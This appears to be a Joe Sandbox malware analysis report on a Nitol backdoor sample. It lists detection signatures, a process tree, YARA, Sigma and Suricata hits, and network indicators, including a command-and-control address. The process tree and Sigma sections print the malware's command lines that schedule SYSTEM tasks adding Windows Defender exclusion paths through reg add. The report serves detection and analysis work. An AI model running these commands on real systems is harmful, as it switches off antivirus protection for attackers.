Edit tour

Windows Analysis Report
45631.exe

Overview

General Information

Sample name:	45631.exe
Analysis ID:	1583301
MD5:	71fb431d4793bb51ce762dc5d719a730
SHA1:	39fcda8ec8c9e472e2c133cf767e1a4b5a00d01f
SHA256:	01c7b434e25b639bed532929cfeac6b4da4d7e9a07cdd0e9f3c93573191865e5
Tags:	backdoorexeuser-zhuzhu0009
Infos:

Detection

Nitol

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected unpacking (creates a PE file in dynamic memory)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Nitol

AI detected suspicious sample

Adds extensions / path to Windows Defender exclusion list (Registry)

Creates an undocumented autostart registry key

Drops PE files to the document folder of the user

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for dropped file

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

Sample is not signed and drops a device driver

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses cmd line tools excessively to alter registry or file data

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to delete services

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the driver directory

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Sigma detected: Windows Defender Exclusions Added - Registry

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

45631.exe (PID: 1656 cmdline: "C:\Users\user\Desktop\45631.exe" MD5: 71FB431D4793BB51CE762DC5D719A730)

sgH8Ps.exe (PID: 4920 cmdline: C:\Users\user\Documents\sgH8Ps.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)

sgH8Ps.exe (PID: 6196 cmdline: C:\Users\user\Documents\sgH8Ps.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)

cmd.exe (PID: 4548 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6980 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3428 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 508 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 4000 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2572 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6136 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6688 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 4780 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6532 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2760 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3404 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 1484 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1488 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6816 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4036 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

Twhtlb.exe (PID: 3744 cmdline: "C:\Program Files (x86)\Twhtlb\Twhtlb.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

cmd.exe (PID: 1732 cmdline: cmd /c echo.>c:\xxxx.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6352 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 2656 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 1436 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 6404 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 5352 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 6780 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 1012 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 6820 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

Twhtlb.exe (PID: 1224 cmdline: "C:\Program Files (x86)\Twhtlb\Twhtlb.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

6WWeC.exe (PID: 1124 cmdline: "C:\Program Files (x86)\K5YQV85\6WWeC.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

Twhtlb.exe (PID: 5692 cmdline: "C:\Program Files (x86)\Twhtlb\Twhtlb.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

Twhtlb.exe (PID: 4908 cmdline: "C:\Program Files (x86)\Twhtlb\Twhtlb.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

6WWeC.exe (PID: 2456 cmdline: "C:\Program Files (x86)\K5YQV85\6WWeC.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Nitol		No Attribution	https://asec.ahnlab.com/en/44504/ https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/ https://en.wikipedia.org/wiki/Nitol_botnet https://krebsonsecurity.com/tag/nitol/	https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: Twhtlb.exe PID: 3744	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: Twhtlb.exe PID: 3744	PlugXStrings	PlugX Identifying Strings	Seth Hardy	0x101bd:$Dwork: d:\work 0x3d020:$Dwork: d:\work 0x9d6fc:$Dwork: d:\work 0xc45d6:$Shell6: Shell6 0xc53b5:$Shell6: Shell6

Unpacked PEs

Source	Rule	Description	Author	Strings
40.2.Twhtlb.exe.2d603e8.3.raw.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
40.2.Twhtlb.exe.10000000.8.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
40.2.Twhtlb.exe.2d603e8.3.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
6.2.sgH8Ps.exe.27e0000.1.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fc20:$e2: Add-MpPreference -ExclusionPath
40.2.Twhtlb.exe.3a40000.5.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x221dd:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x2225b:$e2: Add-MpPreference -ExclusionPath

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\sgH8Ps.exe, ParentImage: C:\Users\user\Documents\sgH8Ps.exe, ParentProcessId: 6196, ParentProcessName: sgH8Ps.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 4548, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Source: Process started

Author: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6352, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 2656, ProcessName: reg.exe

Sigma detected: Windows Defender Exclusions Added - Registry

Source: Registry Key set

Author: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 2656, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData

Suricata Signatures

ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T12:15:54.006747+0100	2852901	1	Malware Command and Control Activity Detected	192.168.2.6	49999	8.217.152.240	8917	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 45631.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Program Files (x86)\K5YQV85\tbcore3U.dll	Avira: detection malicious, Label: TR/Redcap.vdzex
Source: C:\Program Files (x86)\Twhtlb\tbcore3U.dll	Avira: detection malicious, Label: TR/Redcap.vdzex

Multi AV Scanner detection for submitted file

Source: 45631.exe	Virustotal: Detection: 37%			Perma Link
Source: 45631.exe	ReversingLabs: Detection: 28%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\K5YQV85\tbcore3U.dll	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Twhtlb\tbcore3U.dll	Joe Sandbox ML: detected

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe

Unpacked PE file: 40.2.Twhtlb.exe.5300000.7.unpack

Source: unknown	HTTPS traffic detected: 39.103.20.59:443 -> 192.168.2.6:49946 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.6:49991 version: TLS 1.2

Source:	Binary string: d:\depot\ca\EasyDMS\7.10_REL_ntamd64\src\optu\ntamd64\EasyDmsStart.pdb source: 45631.exe
Source:	Binary string: d:\depot\ca\EasyDMS\7.10_REL_ntamd64\src\optu\ntamd64\EasyDmsStart.pdb source: 45631.exe
Source:	Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: Twhtlb.exe, 00000028.00000002.3979563135.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 00000028.00000000.3611622084.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 00000028.00000002.3979769502.000000000115E000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000029.00000002.3648686550.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 00000029.00000000.3638122049.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, 6WWeC.exe, 0000002A.00000000.3641345339.0000000000528000.00000002.00000001.01000000.0000000C.sdmp, 6WWeC.exe, 0000002A.00000002.3651204621.0000000000528000.00000002.00000001.01000000.0000000C.sdmp, Twhtlb.exe, 0000002D.00000000.3651208728.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 0000002D.00000002.3663827299.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 0000002E.00000002.3756389310.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, Twhtlb.exe, 0000002E.00000000.3747948848.0000000000F68000.00000002.00000001.01000000.0000000A.sdmp, 6WWeC.exe, 0000002F.00000002.3764008827.0000000000528000.00000002.00000001.01000000.0000000C.sdmp, 6WWeC.exe, 0000002F.00000000.3751219420.0000000000528000.00000002.00000001.01000000.0000000C.sdmp, 6WWeC.exe.40.dr
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source:	Binary string: y:\avsdk5\user\make\build\public\64-bit\vseamps.pdb source: sgH8Ps.exe, 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmp, sgH8Ps.exe, 00000006.00000000.2757387672.0000000140014000.00000002.00000001.01000000.00000008.sdmp, sgH8Ps.exe, 00000007.00000000.3147439412.0000000140014000.00000002.00000001.01000000.00000008.sdmp, sgH8Ps.exe.0.dr

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramData	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\Documents	Jump to behavior

Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Users\user\Documents\sgH8Ps.exe

Code function: 6_2_00007FFDA55DA1B8 FindFirstFileExW,

6_2_00007FFDA55DA1B8

Source: C:\Users\user\Documents\sgH8Ps.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Documents\sgH8Ps.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	6_2_000000014000DFFE
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	6_2_000000014000DDFF
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 4x nop then movsxd rbx, qword ptr [r14+10h]	6_2_0000000140011270
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	6_2_000000014000DE96
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	6_2_000000014000DEFB
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	6_2_000000014000E178
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	6_2_000000014000DDD9

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.6:49999 -> 8.217.152.240:8917

Source: global traffic

TCP traffic: 192.168.2.6:49999 -> 8.217.152.240:8917

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 8.217.152.240
Source: unknown	TCP traffic detected without corresponding DNS query: 8.217.152.240
Source: unknown	TCP traffic detected without corresponding DNS query: 8.217.152.240
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

